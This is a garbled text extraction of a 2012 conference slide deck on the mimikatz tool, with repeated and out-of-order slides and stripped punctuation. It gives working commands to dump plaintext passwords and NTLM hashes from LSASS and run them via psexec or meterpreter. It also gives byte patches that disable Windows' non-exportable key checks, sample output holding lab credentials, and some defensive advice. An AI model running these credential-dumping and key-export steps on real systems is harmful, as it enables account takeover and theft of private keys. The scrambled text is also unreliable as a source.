CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
